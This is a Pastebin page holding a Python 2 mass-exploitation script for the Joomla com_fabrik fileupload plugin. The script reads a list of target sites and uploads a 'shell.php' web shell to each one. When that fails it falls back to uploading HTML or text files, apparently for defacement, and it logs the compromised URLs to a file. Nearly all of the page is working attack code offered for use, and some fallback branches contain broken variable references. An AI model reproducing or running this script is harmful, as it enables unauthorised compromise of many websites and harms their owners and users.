indonesian

Exploit com_fabrik (multi file)

Dec 12th, 2017
519
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.70 KB | None | 0 0
  1. #!/usr/bin/env python2
  2. # How to use
  3. # python com_fabrik.py target.txt
  4.  
  5. import requests
  6. import json
  7. import sys
  8. import urllib3
  9.  
  10. shl = "shell.php"
  11. htm = "index.htm"
  12. txt = "file.txt"
  13. urllib3.disable_warnings()
  14. print """====================================================
  15. ||              Exploit com_fabrik                ||
  16. ||          Backbox Indonesia Version             ||
  17. ====================================================
  18. """
  19. arg = open(sys.argv[1], 'r').read().split('\n')
  20. for i in arg:
  21.     if not i:
  22.         break
  23.  
  24.     url = str(i) + str('/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload')
  25.     files = {'file': open(shl, 'rb')}
  26.     try: r = requests.post(url, files=files, verify=False, timeout=5)
  27.     except requests.ConnectionError: continue
  28.     except requests.exceptions.Timeout: continue
  29.     except ValueError: continue
  30.  
  31.     content = r.content
  32.     print "[!] Target : {}".format(i)
  33.     print "[*] Uploading shell.."
  34.     try: jso = json.loads(content)
  35.     except ValueError:
  36.         print "[-] Can't upload shell..\n"
  37.         continue
  38.  
  39.     try: shel = jso['uri']
  40.     except KeyError:
  41.         print "[-] Shell can't be upload..\n"
  42.         continue
  43.  
  44.     try: req = requests.get(shel, verify=False, timeout=5)
  45.     except ValueError:
  46.         print "[-] Shell can't be upload.."
  47.         hatm = {'file': open(htm, 'rb')}
  48.         try: rh = requests.post(url, files=hatm, verify=False, timeout=5)
  49.         except ValueError: continue
  50.  
  51.         ch = rh.content
  52.         print "[*] Uploading htm.."
  53.         jh = json.loads(ch)
  54.         sh = jh['uri']
  55.         try: rq = requests.get(sh, verify=False, timeout=5)
  56.         except ValueError:
  57.             print "[-] Can't upload htm.."
  58.             tex = {'file': open(txt, 'rb')}
  59.             try: rt = requests.post(url, files=tex, verify=False, timeout=5)
  60.             except ValueError: continue
  61.  
  62.             ct = rt.content
  63.             print "[*] Uploading txt.."
  64.             jt = json.loads(ct)
  65.             ut = jt['uri']
  66.             try: rgt = requests.get(ut, verify=False, timeout=5)
  67.             except ValueError:
  68.                 print "[-] Can't upload txt..\n"
  69.                 continue
  70.  
  71.             stt = ut.status_code
  72.             if int(stt) == 200:
  73.                 print "[+] Txt uploaded : {} [OK]\n".format(ut)
  74.                 et = "{}\n".format(st)
  75.                 open('sukses.txt', 'a').write(et)
  76.             else:
  77.                 print "[-] Txt can't be upload..\n"
  78.                 continue
  79.  
  80.         st = rq.status_code
  81.         if int(st) == 200:
  82.             print "[+] Htm uploaded : {} [OK]\n".format(sh)
  83.             seh = "{}\n".format(sh)
  84.             open('sukses.txt', 'a').write(seh)
  85.         else:
  86.             print "[-] Htm can't be upload..\n"
  87.             continue
  88.  
  89.     stat = req.status_code
  90.     if int(stat) == 200:
  91.         print "[+] Shell uploaded : {} [OK]\n".format(shel)
  92.         sep = "{}\n".format(shel)
  93.         open('sukses.txt', 'a').write(sep)
  94.     else:
  95.         print "[-] Shell can't be upload..\n"
  96.  
  97. print "[+] Saved to : sukses.txt"
  98. print "[!] Exploit compleated.."
Advertisement
Add Comment
Please, Sign In to add comment